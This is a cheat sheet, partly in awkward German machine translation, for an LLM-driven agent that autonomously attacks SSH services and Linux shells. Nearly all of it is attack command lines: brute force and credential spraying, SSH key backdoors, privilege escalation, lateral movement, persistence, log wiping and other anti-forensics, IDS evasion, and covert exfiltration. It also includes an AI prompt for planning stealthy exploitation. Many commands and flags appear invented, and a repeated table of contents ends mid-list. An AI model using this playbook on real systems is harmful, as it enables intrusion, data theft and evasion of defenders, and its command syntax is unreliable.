ARACNE Cheat Sheet¶

generieren

Überblick¶

ARACNE (Autonome Reconnaissance und Angriffskoordination für Netzwerkausbeutung) ist ein LLM-basierter Agent, der speziell für die Ausrichtung von SSH-Diensten und die autonome Erkundung und Ausbeutung von Linux Shell-Umgebungen entwickelt wurde. Es kombiniert große Sprachmodelle mit traditionellen Penetrationstests, um anspruchsvolle Angriffe auf SSH-taugliche Systeme durchzuführen.

ZEIT Kritische Warnung: Fortgeschrittenes autonomes Ausbeutungswerkzeug. Verwenden Sie nur auf Systemen, die Sie besitzen oder eine ausdrückliche schriftliche Berechtigung zum Testen haben. Unberechtigte Nutzung ist illegal.

Installation¶

Voraussetzungen¶

```bash

System requirements¶

python3 --version # Python 3.9+ pip3 --version git --version

Required system packages¶

sudo apt update sudo apt install -y python3-pip python3-venv git curl wget sudo apt install -y openssh-client sshpass hydra nmap masscan

Install additional security tools¶

sudo apt install -y john hashcat gobuster dirb nikto sudo apt install -y metasploit-framework exploitdb ```_

Installationsmethoden¶

```bash

Method 1: Git clone and setup¶

git clone https://github.com/aracne-ai/aracne.git cd aracne python3 -m venv venv source venv/bin/activate pip install -r requirements.txt

Install LLM dependencies¶

pip install openai anthropic langchain pip install transformers torch pip install paramiko fabric pexpect

Method 2: Docker installation¶

docker pull aracne/aracne:latest docker run -it --rm -v $(pwd)/sessions:/app/sessions aracne/aracne:latest

Method 3: PyPI installation (if available)¶

pip install aracne-agent ```_

Konfiguration Setup¶

```bash

Create configuration directory¶

mkdir -p ~/.aracne/config mkdir -p ~/.aracne/sessions mkdir -p ~/.aracne/payloads mkdir -p ~/.aracne/logs

Initialize configuration¶

aracne init

Configure LLM providers¶

aracne config set openai_api_key "your-openai-key" aracne config set openai_model "gpt-4" aracne config set anthropic_api_key "your-anthropic-key"

Set operational parameters¶

aracne config set max_session_time 3600 aracne config set autonomous_mode true aracne config set stealth_mode true aracne config set evidence_collection true ```_

Kernkommandos¶

Grundgeschäfte¶

```bash

Display help and version¶

aracne --help aracne --version aracne modules list

Quick SSH reconnaissance¶

aracne recon ssh --target 192.168.1.100 aracne recon ssh --network 192.168.1.0/24 aracne recon ssh --target-list targets.txt

SSH service analysis¶

aracne analyze ssh --target 192.168.1.100 --deep aracne analyze ssh --target 192.168.1.100 --version-detection aracne analyze ssh --target 192.168.1.100 --configuration-analysis

System status and health¶

aracne status aracne health-check aracne modules status ```_

Zielmanagement¶

```bash

Add SSH targets¶

aracne target add --host 192.168.1.100 --port 22 aracne target add --host example.com --port 2222 aracne target add --network 192.168.1.0/24 --ssh-only

Target information and management¶

aracne target list --active aracne target info 192.168.1.100 aracne target remove 192.168.1.100

Import targets from various sources¶

aracne target import --nmap ssh_scan.xml aracne target import --masscan masscan_results.txt aracne target import --file ssh_targets.txt

Target prioritization¶

aracne target prioritize --by vulnerability aracne target prioritize --by accessibility aracne target prioritize --custom-scoring ```_

Sitzungsmanagement¶

```bash

Create and manage attack sessions¶

aracne session create --target 192.168.1.100 --name "target_compromise" aracne session list --active aracne session switch target_compromise

Session configuration¶

aracne session config --max-duration 2h aracne session config --stealth-level high aracne session config --logging-level verbose

Session control¶

aracne session start --target 192.168.1.100 aracne session pause target_compromise aracne session resume target_compromise aracne session terminate target_compromise ```_

SSH Aufklärung und Analyse¶

SSH Service Discovery¶

```bash

Comprehensive SSH discovery¶

aracne discover ssh --network 192.168.1.0/24 --comprehensive aracne discover ssh --target-list targets.txt --fast aracne discover ssh --target 192.168.1.100 --deep-analysis

aracne analyze banner --target 192.168.1.100 aracne analyze version --target 192.168.1.100 --vulnerability-check aracne analyze configuration --target 192.168.1.100 --security-assessment

SSH algorithm and cipher analysis¶

aracne analyze algorithms --target 192.168.1.100 aracne analyze ciphers --target 192.168.1.100 --weak-crypto aracne analyze kex --target 192.168.1.100 --security-analysis ```_

SSH Schwachstellenbewertung¶

```bash

SSH-specific vulnerability scanning¶

aracne vuln scan-ssh --target 192.168.1.100 --comprehensive aracne vuln scan-ssh --target 192.168.1.100 --known-exploits aracne vuln scan-ssh --network 192.168.1.0/24 --quick

Configuration vulnerability analysis¶

aracne vuln config --target 192.168.1.100 --misconfigurations aracne vuln config --target 192.168.1.100 --weak-settings aracne vuln config --target 192.168.1.100 --default-configs

SSH implementation vulnerabilities¶

aracne vuln implementation --target 192.168.1.100 --version-specific aracne vuln implementation --target 192.168.1.100 --buffer-overflows aracne vuln implementation --target 192.168.1.100 --timing-attacks ```_

Benutzeraufzählung¶

```bash

SSH user enumeration techniques¶

aracne enum users --target 192.168.1.100 --timing-based aracne enum users --target 192.168.1.100 --error-based aracne enum users --target 192.168.1.100 --comprehensive

Username wordlist generation¶

aracne generate usernames --target 192.168.1.100 --context-aware aracne generate usernames --company "Example Corp" --employees aracne generate usernames --domain example.com --email-based

User validation and verification¶

aracne validate users --target 192.168.1.100 --user-list users.txt aracne validate users --target 192.168.1.100 --probabilistic aracne validate users --target 192.168.1.100 --stealth-mode ```_

Autonome SSH Exploitation¶

Credential-basierte Angriffe¶

```bash

Intelligent brute force attacks¶

aracne attack brute-force --target 192.168.1.100 --smart aracne attack brute-force --target 192.168.1.100 --user admin --adaptive aracne attack brute-force --target 192.168.1.100 --credential-stuffing

Dictionary attacks with AI optimization¶

aracne attack dictionary --target 192.168.1.100 --ai-optimized aracne attack dictionary --target 192.168.1.100 --context-aware aracne attack dictionary --target 192.168.1.100 --pattern-learning

Credential spraying¶

aracne attack spray --network 192.168.1.0/24 --common-passwords aracne attack spray --target-list targets.txt --seasonal-passwords aracne attack spray --targets multiple --lockout-aware ```_

Schlüsselangriffe¶

```bash

SSH key discovery and analysis¶

aracne keys discover --target 192.168.1.100 --web-crawling aracne keys discover --target 192.168.1.100 --git-repositories aracne keys discover --target 192.168.1.100 --configuration-files

Private key attacks¶

aracne keys attack --target 192.168.1.100 --weak-keys aracne keys attack --target 192.168.1.100 --default-keys aracne keys attack --target 192.168.1.100 --cracking

Key injection and manipulation¶

aracne keys inject --target 192.168.1.100 --authorized-keys aracne keys manipulate --target 192.168.1.100 --key-replacement aracne keys backdoor --target 192.168.1.100 --persistent-access ```_

Protokoll-Level Exploits¶

```bash

SSH protocol exploitation¶

aracne exploit protocol --target 192.168.1.100 --version-specific aracne exploit protocol --target 192.168.1.100 --implementation-bugs aracne exploit protocol --target 192.168.1.100 --timing-attacks

Man-in-the-middle attacks¶

aracne exploit mitm --target 192.168.1.100 --arp-poisoning aracne exploit mitm --target 192.168.1.100 --dns-spoofing aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

Downgrade attacks¶

aracne exploit downgrade --target 192.168.1.100 --weak-algorithms aracne exploit downgrade --target 192.168.1.100 --legacy-protocols aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade ```_

Linux Shell Exploitation¶

Erster Zugang und Shell-Betrieb¶

```bash

Establish initial shell access¶

aracne shell establish --target 192.168.1.100 --method ssh aracne shell establish --target 192.168.1.100 --credentials user:pass aracne shell establish --target 192.168.1.100 --key-file private_key

Shell upgrade and stabilization¶

aracne shell upgrade --session session-123 --interactive aracne shell upgrade --session session-123 --pty aracne shell upgrade --session session-123 --full-terminal

Shell persistence mechanisms¶

aracne shell persist --session session-123 --cron-job aracne shell persist --session session-123 --systemd-service aracne shell persist --session session-123 --ssh-keys ```_

System Reconnaissance¶

```bash

Autonomous system enumeration¶

aracne recon system --session session-123 --comprehensive aracne recon system --session session-123 --quick-wins aracne recon system --session session-123 --stealth-mode

User and privilege enumeration¶

aracne recon users --session session-123 --all-users aracne recon users --session session-123 --privileged-users aracne recon users --session session-123 --sudo-capabilities

Network and service discovery¶

aracne recon network --session session-123 --internal-networks aracne recon services --session session-123 --running-services aracne recon processes --session session-123 --interesting-processes ```_

Vorrechte Eskalation¶

```bash

Autonomous privilege escalation¶

aracne privesc auto --session session-123 --all-techniques aracne privesc auto --session session-123 --kernel-exploits aracne privesc auto --session session-123 --suid-binaries

Specific escalation techniques¶

aracne privesc sudo --session session-123 --sudo-abuse aracne privesc cron --session session-123 --cron-jobs aracne privesc services --session session-123 --service-abuse

Custom escalation strategies¶

aracne privesc custom --session session-123 --ai-guided aracne privesc search --session session-123 --novel-techniques aracne privesc exploit --session session-123 --zero-day ```_

Spätere Bewegung¶

```bash

Network lateral movement¶

aracne lateral network --session session-123 --ssh-keys aracne lateral network --session session-123 --credential-reuse aracne lateral network --session session-123 --trust-relationships

Service-based lateral movement¶

aracne lateral services --session session-123 --shared-services aracne lateral services --session session-123 --database-access aracne lateral services --session session-123 --file-shares

Advanced lateral movement¶

aracne lateral advanced --session session-123 --kerberos aracne lateral advanced --session session-123 --container-escape aracne lateral advanced --session session-123 --cloud-metadata ```_

AI-Powered Decision Making¶

Autonome Richtmaschine¶

```python

AI reasoning configuration¶

reasoning_config = { "model": "gpt-4", "temperature": 0.2, "max_tokens": 4000, "reasoning_depth": 3, "confidence_threshold": 0.85, "exploration_factor": 0.3 }

Custom reasoning prompts for SSH exploitation¶

ssh_analysis_prompt = """ Analyze the SSH service and system information: Target: {target} SSH Version: {ssh_version} Available Users: {users} System Information: {system_info} Previous Attempts: {previous_attempts}

Determine the best exploitation strategy: 1. Most likely attack vectors 2. Probability of success for each 3. Stealth considerations 4. Risk assessment 5. Next steps recommendation """ ```_

Adaptive Angriffsstrategien¶

```bash

AI-guided attack planning¶

aracne ai plan-attack --target 192.168.1.100 --objective shell-access aracne ai plan-attack --session session-123 --objective privilege-escalation aracne ai plan-attack --target 192.168.1.100 --stealth-priority

Dynamic strategy adaptation¶

aracne ai adapt-strategy --session session-123 --defense-detected aracne ai adapt-strategy --session session-123 --failure-analysis aracne ai adapt-strategy --session session-123 --new-information

Learning from interactions¶

aracne ai learn --session session-123 --command-responses aracne ai learn --target 192.168.1.100 --defense-mechanisms aracne ai learn --global --pattern-recognition ```_

Intelligente Befehlsgeneration¶

```bash

AI-generated commands for exploration¶

aracne ai generate-commands --session session-123 --exploration aracne ai generate-commands --session session-123 --privilege-escalation aracne ai generate-commands --session session-123 --persistence

Context-aware command selection¶

aracne ai select-commands --session session-123 --current-context aracne ai select-commands --session session-123 --objective-focused aracne ai select-commands --session session-123 --stealth-optimized

Command effectiveness analysis¶

aracne ai analyze-effectiveness --session session-123 --command-history aracne ai analyze-effectiveness --session session-123 --success-patterns aracne ai analyze-effectiveness --session session-123 --failure-analysis ```_

Advanced Exploitation Techniques¶

Stealth und Evasion¶

```bash

Stealth mode operations¶

aracne stealth enable --session session-123 --advanced-evasion aracne stealth timing --session session-123 --random-delays aracne stealth obfuscation --session session-123 --command-obfuscation

Anti-forensics techniques¶

aracne antiforensics enable --session session-123 --log-cleaning aracne antiforensics timestamps --session session-123 --timestamp-manipulation aracne antiforensics artifacts --session session-123 --artifact-removal

Detection evasion¶

aracne evasion ids --session session-123 --ids-evasion aracne evasion monitoring --session session-123 --monitoring-detection aracne evasion behavioral --session session-123 --behavioral-mimicry ```_

Persistenzmechanismen¶

```bash

Establish persistent access¶

aracne persist establish --session session-123 --multiple-methods aracne persist establish --session session-123 --stealth-persistence aracne persist establish --session session-123 --redundant-access

Persistence validation and testing¶

aracne persist validate --session session-123 --all-methods aracne persist test --session session-123 --reconnection-test aracne persist monitor --session session-123 --persistence-health

Persistence cleanup and removal¶

aracne persist cleanup --session session-123 --selective-removal aracne persist remove --session session-123 --complete-cleanup aracne persist verify-removal --session session-123 --forensic-check ```_

Daten Exfiltration und Sammlung¶

```bash

Intelligent data discovery¶

aracne data discover --session session-123 --sensitive-files aracne data discover --session session-123 --database-content aracne data discover --session session-123 --configuration-files

Data classification and prioritization¶

aracne data classify --session session-123 --ai-classification aracne data prioritize --session session-123 --business-value aracne data assess --session session-123 --sensitivity-analysis

Secure data exfiltration¶

aracne data exfiltrate --session session-123 --encrypted-channel aracne data exfiltrate --session session-123 --steganography aracne data exfiltrate --session session-123 --covert-channels ```_

Überwachung und Protokollierung¶

Sitzungsüberwachung¶

```bash

Real-time session monitoring¶

aracne monitor session --session session-123 --real-time aracne monitor activity --session session-123 --command-tracking aracne monitor progress --session session-123 --objective-tracking

Performance and resource monitoring¶

aracne monitor performance --session session-123 --resource-usage aracne monitor network --session session-123 --traffic-analysis aracne monitor system --session session-123 --system-impact

Alert and notification system¶

aracne monitor alerts --session session-123 --critical-events aracne monitor notifications --session session-123 --progress-updates aracne monitor warnings --session session-123 --risk-indicators ```_

Umfassendes Loggen¶

```bash

Enable detailed logging¶

aracne logging enable --session session-123 --comprehensive aracne logging enable --session session-123 --ai-decisions aracne logging enable --session session-123 --command-responses

Log analysis and insights¶

aracne logging analyze --session session-123 --pattern-analysis aracne logging analyze --session session-123 --success-factors aracne logging analyze --session session-123 --failure-analysis

Log export and reporting¶

aracne logging export --session session-123 --format json aracne logging export --session session-123 --timeline-format aracne logging export --session session-123 --forensic-format ```_

Sicherheit und Ethische Überlegungen¶

Zulassung und rechtliche Einhaltung¶

```bash

Define authorized targets and scope¶

aracne scope define --target 192.168.1.100 --authorized aracne scope define --network 192.168.1.0/24 --internal-testing aracne scope validate --target 192.168.1.100 --legal-check

Documentation and evidence¶

aracne legal document --session session-123 --authorization-proof aracne legal evidence --session session-123 --chain-of-custody aracne legal export --session session-123 --court-ready

Compliance verification¶

aracne compliance check --session session-123 --ethical-guidelines aracne compliance verify --session session-123 --legal-requirements aracne compliance audit --session session-123 --comprehensive ```_

Sicherheit und Risikomanagement¶

```bash

Risk assessment and management¶

aracne risk assess --session session-123 --comprehensive aracne risk monitor --session session-123 --real-time aracne risk mitigate --session session-123 --automatic

Safety controls and limits¶

aracne safety enable --session session-123 --all-controls aracne safety limits --session session-123 --time-limits aracne safety boundaries --session session-123 --scope-enforcement

Emergency procedures¶

aracne emergency stop --session session-123 --immediate aracne emergency cleanup --session session-123 --evidence-removal aracne emergency report --session session-123 --incident-documentation ```_

Fehlerbehebung und Optimierung¶

Leistungsoptimierung¶

```bash

Optimize AI model performance¶

aracne optimize ai --model-selection --performance-focused aracne optimize ai --token-usage --cost-optimization aracne optimize ai --response-time --latency-reduction

Session performance optimization¶

aracne optimize session --session session-123 --speed-optimization aracne optimize session --session session-123 --resource-optimization aracne optimize session --session session-123 --stealth-optimization

Network and connectivity optimization¶

aracne optimize network --session session-123 --connection-stability aracne optimize network --session session-123 --bandwidth-optimization aracne optimize network --session session-123 --latency-reduction ```_

Debugging und Diagnose¶

```bash

Debug mode and verbose logging¶

aracne --debug session start --target 192.168.1.100 aracne --verbose ai plan-attack --target 192.168.1.100 aracne logs view --level debug --component ai-reasoning

System diagnostics¶

aracne diagnose system --comprehensive aracne diagnose ai-models --connectivity-test aracne diagnose ssh-client --configuration-check

Error analysis and resolution¶

aracne errors analyze --session session-123 --root-cause aracne errors resolve --error-id 12345 --auto-fix aracne errors prevent --session session-123 --predictive-analysis ```_

Wiederherstellung und Sicherung¶

```bash

Session recovery and restoration¶

aracne recover session --session-id session-123 --full-recovery aracne recover state --session session-123 --checkpoint-restore aracne recover connection --session session-123 --reconnect

Backup and data protection¶

aracne backup create --session session-123 --incremental aracne backup restore --backup-id backup-456 --selective aracne backup verify --backup-id backup-456 --integrity-check

Data integrity and validation¶

aracne verify integrity --session session-123 --all-data aracne verify consistency --session session-123 --cross-validation aracne verify authenticity --session session-123 --digital-signatures ```_

Integrationsbeispiele¶

SIEM Integration¶

```python

integrations/siem_integration.py¶

import json import requests from aracne.core.integration import BaseIntegration

class SIEMIntegration(BaseIntegration): def init(self, siem_url, api_key): self.siem_url = siem_url self.api_key = api_key

def send_ssh_attempt(self, attempt_data):
    event = {
        "timestamp": attempt_data.timestamp,
        "source": "aracne",
        "event_type": "ssh_attempt",
        "target": attempt_data.target,
        "username": attempt_data.username,
        "success": attempt_data.success,
        "method": attempt_data.method
    }

    self.send_event(event)

def send_privilege_escalation(self, privesc_data):
    event = {
        "timestamp": privesc_data.timestamp,
        "source": "aracne",
        "event_type": "privilege_escalation",
        "target": privesc_data.target,
        "technique": privesc_data.technique,
        "success": privesc_data.success,
        "privileges_gained": privesc_data.privileges
    }

    self.send_event(event)

def send_event(self, event):
    headers = {
        "Authorization": f"Bearer {self.api_key}",
        "Content-Type": "application/json"
    }

    response = requests.post(
        f"{self.siem_url}/api/events",
        headers=headers,
        json=event
    )

    return response.status_code == 200

```_

Threat Intelligence Integration¶

```python

integrations/threat_intel.py¶

import requests from aracne.core.threat_intel import ThreatIntelProvider

class ThreatIntelIntegration(ThreatIntelProvider): def init(self, api_key): self.api_key = api_key self.base_url = "https://api.threatintel.com"

def get_ssh_vulnerabilities(self, ssh_version):
    headers = {"Authorization": f"Bearer {self.api_key}"}

    response = requests.get(
        f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
        headers=headers
    )

    if response.status_code == 200:
        return response.json()
    return []

def get_exploit_techniques(self, target_os, target_version):
    headers = {"Authorization": f"Bearer {self.api_key}"}

    response = requests.get(
        f"{self.base_url}/techniques/{target_os}/{target_version}",
        headers=headers
    )

    if response.status_code == 200:
        return response.json()
    return []

def report_new_technique(self, technique_data):
    headers = {
        "Authorization": f"Bearer {self.api_key}",
        "Content-Type": "application/json"
    }

    response = requests.post(
        f"{self.base_url}/techniques/report",
        headers=headers,
        json=technique_data
    )

    return response.status_code == 201

```_

Best Practices¶

SSH Exploitation Best Practices¶

```bash

Reconnaissance before exploitation¶

aracne recon comprehensive --target 192.168.1.100 --pre-exploitation aracne analyze target --target 192.168.1.100 --vulnerability-assessment aracne plan attack --target 192.168.1.100 --risk-assessment

Gradual escalation approach¶

aracne attack gentle --target 192.168.1.100 --low-impact aracne attack moderate --target 192.168.1.100 --measured-approach aracne attack aggressive --target 192.168.1.100 --high-confidence

Stealth and operational security¶

aracne stealth maximum --session session-123 --anti-detection aracne opsec enable --session session-123 --comprehensive aracne evasion advanced --session session-123 --adaptive ```_

KI Modelloptimierung¶

```bash

Model selection and tuning¶

aracne ai optimize --model-selection --task-specific aracne ai tune --parameters --performance-focused aracne ai calibrate --confidence-thresholds --accuracy-focused

Prompt engineering and optimization¶

aracne ai optimize-prompts --task ssh-exploitation aracne ai optimize-prompts --task privilege-escalation aracne ai optimize-prompts --task lateral-movement

Continuous learning and improvement¶

aracne ai learn --from-sessions --pattern-recognition aracne ai update --knowledge-base --latest-techniques aracne ai validate --accuracy --benchmark-testing ```_

Operationelle Exzellenz¶

```bash

Session management best practices¶

aracne session plan --target 192.168.1.100 --comprehensive-planning aracne session execute --plan session-plan --monitored-execution aracne session review --session session-123 --lessons-learned

Documentation and reporting¶

aracne document session --session session-123 --comprehensive aracne report generate --session session-123 --technical-details aracne evidence collect --session session-123 --forensic-quality

Quality assurance and validation¶

aracne validate findings --session session-123 --cross-verification aracne verify exploits --session session-123 --proof-of-concept aracne assess impact --session session-123 --business-context ```_

ARACNE Cheat Sheet¶

Überblick¶

Installation¶

Voraussetzungen¶

System requirements¶

Required system packages¶

Install additional security tools¶

Installationsmethoden¶

Method 1: Git clone and setup¶

Install LLM dependencies¶

Method 2: Docker installation¶

Method 3: PyPI installation (if available)¶

Konfiguration Setup¶

Create configuration directory¶

Initialize configuration¶

Configure LLM providers¶

Set operational parameters¶

Kernkommandos¶

Grundgeschäfte¶

Display help and version¶

Quick SSH reconnaissance¶

SSH service analysis¶

System status and health¶

Zielmanagement¶

Add SSH targets¶

Target information and management¶

Import targets from various sources¶

Target prioritization¶

Sitzungsmanagement¶

Create and manage attack sessions¶

Session configuration¶

Session control¶

SSH Aufklärung und Analyse¶

SSH Service Discovery¶

Comprehensive SSH discovery¶

SSH version and banner analysis¶

SSH algorithm and cipher analysis¶

SSH Schwachstellenbewertung¶

SSH-specific vulnerability scanning¶

Configuration vulnerability analysis¶

SSH implementation vulnerabilities¶

Benutzeraufzählung¶

SSH user enumeration techniques¶

Username wordlist generation¶

User validation and verification¶

Autonome SSH Exploitation¶

Credential-basierte Angriffe¶

Intelligent brute force attacks¶

Dictionary attacks with AI optimization¶

Credential spraying¶

Schlüsselangriffe¶

SSH key discovery and analysis¶

Private key attacks¶

Key injection and manipulation¶

Protokoll-Level Exploits¶

SSH protocol exploitation¶

Man-in-the-middle attacks¶

Downgrade attacks¶

Linux Shell Exploitation¶

Erster Zugang und Shell-Betrieb¶

Establish initial shell access¶

Shell upgrade and stabilization¶

Shell persistence mechanisms¶

System Reconnaissance¶

Autonomous system enumeration¶

User and privilege enumeration¶

Network and service discovery¶

Vorrechte Eskalation¶

Autonomous privilege escalation¶

Specific escalation techniques¶

Custom escalation strategies¶

Spätere Bewegung¶

Network lateral movement¶

Service-based lateral movement¶

Advanced lateral movement¶

AI-Powered Decision Making¶

Autonome Richtmaschine¶

AI reasoning configuration¶

Custom reasoning prompts for SSH exploitation¶

Adaptive Angriffsstrategien¶